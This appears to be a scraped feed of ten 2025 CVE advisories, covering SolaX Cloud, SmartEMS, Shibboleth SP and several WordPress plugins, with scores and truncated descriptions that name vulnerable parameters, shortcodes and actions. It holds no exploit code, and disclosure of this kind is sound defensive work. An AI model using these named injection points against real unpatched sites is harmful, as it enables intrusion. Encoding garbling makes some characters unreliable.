5.8
CVE-2025-36756 - Device Takeover vulnerability in SolaX Cloud
A problem with missing authorization on SolaX Cloud platform allows taking over any SolaX solarpanel inverter of which the serial number is known.
8.8
CVE-2025-41714 - Path Traversal via 'Upload-Key' in SmartEMS Upload Handling
The upload endpoint insufficiently validates the 'Upload-Key' request header. By supplying path traversal sequences, an authenticated attacker can cause the server to create upload-related artifacts outside the intended storage location. In certain configurations this enables arbitrary file write aโฆ
9.1
CVE-2025-9943 - Unauthenticated SQL Injection Vulnerability in Shibboleth Service Provider
An SQL injection vulnerability has been identified in the "ID" attribute of the SAML response when the replay cache of the Shibboleth Service Provider (SP) is configured to use an SQL database as storage service. An unauthenticated attacker can exploit this issue via blind SQL injection, allowing fโฆ
4.9
CVE-2025-10142 - PagBank / PagSeguro Connect para WooCommerce <= 4.44.3 - Authenticated (Shop Manager+) SQL Injection
The PagBank / PagSeguro Connect para WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'status' parameter in all versions up to, and including, 4.44.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. Thiโฆ
6.4
CVE-2025-9857 - Heateor Login โ Social Login Plugin <= 1.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripโฆ
The Heateor Login โ Social Login Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Heateor_Facebook_Login' shortcode in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makeโฆ
6.4
CVE-2025-10126 - MyBrain Utilities <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
The MyBrain Utilities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugins's 'mbumap' shortcode in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated aโฆ
7.2
CVE-2025-10001 - Import any XML, CSV or Excel File to WordPress <= 3.9.3 - Authenticated (Admin+) Limited Unsafe Filโฆ
The Import any XML, CSV or Excel File to WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import functionality in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with Administrator-level aโฆ
4.3
CVE-2025-9888 - Maspik <= 2.5.6 - Cross-Site Request Forgery
The Maspik โ Ultimate Spam Protection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.6. This is due to missing or incorrect nonce validation on the clear_log function. This makes it possible for unauthenticated attackers to clear all spam โฆ
4.3
CVE-2025-9622 - WP Blast | SEO & Performance Booster <= 1.8.6 - Cross-Site Request Forgery to Cache Clearing
The WP Blast | SEO & Performance Booster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.6. This is due to missing or incorrect nonce validation on multiple administrative actions in the Settings class. This makes it possible for unauthentiโฆ
7.7
CVE-2025-10040 - WP Import โ Ultimate CSV XML Importer for WordPress <= 7.27 - Missing Authorization to Authenticateโฆ
The WP Import โ Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ftp_details' AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subscโฆ